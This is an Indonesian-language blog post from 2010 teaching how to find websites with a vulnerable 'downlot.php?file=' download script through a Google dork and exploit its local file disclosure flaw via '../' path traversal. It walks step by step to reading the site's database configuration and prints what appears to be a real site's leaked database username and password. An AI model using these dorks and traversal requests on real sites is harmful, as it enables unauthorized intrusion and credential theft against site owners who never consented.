Selasa, 15 Juni 2010

Local File Disclosure..

 

Wah ni cara baru saya di ajari ama kang rahman(thx banget dach buat si akang udah mau lajarien saya yang cupu banget ni) ...tapi cara ini kalau saya bilang cukup mudah… :-P , tanpa ngebacot terlalu lama lagi ..dan agan sekalian pasti bosen dengan bacotan saya..kita langsung saja ke pokoknya..seperti kata Om parto kita Ke TKP..:-P

Masukkan Dork ini di SE kesayang kita yaitu mbah Google ..huhuhu

 inurl:downlot.php?file=

nahh banyakan site” pilih salah satu dech..

jika agan sudah menemukan site yang agan suka kita lanjut..

misal:

website/downlot.php?file=blalalalalalalalalalal

nahh hapus yang ada di belakan tanda “=” tanpa tanda petik

jadinya seperti ini : website/downlot.php?file=

tambahkan “../index.php" tanpa tand da petik ..

jadinya seperti ini :

website/downlot.php?file=../index.php

jika isinya kurang lebih seperti ini kita lanjut.kalau ngga ya cari site lain :-P

  include "rss.php";

  header('location:home');

?>

 

Kita lanjut ketahap berikutnya..

Ganti index.php menjadi rss.php tanpa tanda petik..

Jadinya seperti ini :

Website/downlot.php?file=../rss.php

Kurang lebih isinya seperti ini:

include "config/koneksi.php";

 

$sql = mysql_query("SELECT * FROM berita ORDER BY id_berita DESC LIMIT 5");

 

$file = fopen("rss.xml", "w");

 

fwrite($file, '

http:../herusc

Feed Description

en-us');

 

while($r=mysql_fetch_array($sql)){

  $isi_berita = htmlentities(strip_tags(nl2br($r[isi_berita]))); // membuat paragraf pada isi berita dan mengabaikan tag html

  $isi   = substr($isi_berita,0,220); // ambil sebanyak 220 karakter

  $isi   = substr($isi_berita,0,strrpos($isi," ")); // potong per spasi kalimat

 

  fwrite($file, "

                

                 http:../herusc/berita-$r[id_berita]-$r[judul_seo].html

                 $isi ...

                 ");

}

 

fwrite($file, "");

fclose($file);

?>

 

Kita lanjut ketahap akhir..

Ganti “rss.php” menjadi config/koneksi.php” udah tau kan (tanpa tanda petik :-P)

Jadinya seperti ini :

website/downlot.php?file=../ config/koneksi.php >>dan disinilah id dan password website sang admin <<

$server = "localhost";

$username = "heruscco_herusc";

$password = "m^lfNqd;KKSoBV)";

$database = "heruscco_h312u";

 

// Koneksi dan memilih database di server

mysql_connect($server,$username,$password) or die("Koneksi gagal");

mysql_select_db($database) or die("Database tidak bisa dibuka");

?>

Nahh segithu ajja jika ada kesalahan dalam penulisan harap di maklumi..

 

Nb: cara ini hanya bisa di lakukan di website local..

 

Thx to :Allah, my family, Mr.terminate , melodiazz, ade yonathan, rahman banditcode,all member i-TOFU,  ilyaz, dan you,,

 

 

Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Terima Kasih atas komentar anda

Langganan: Posting Komentar (Atom)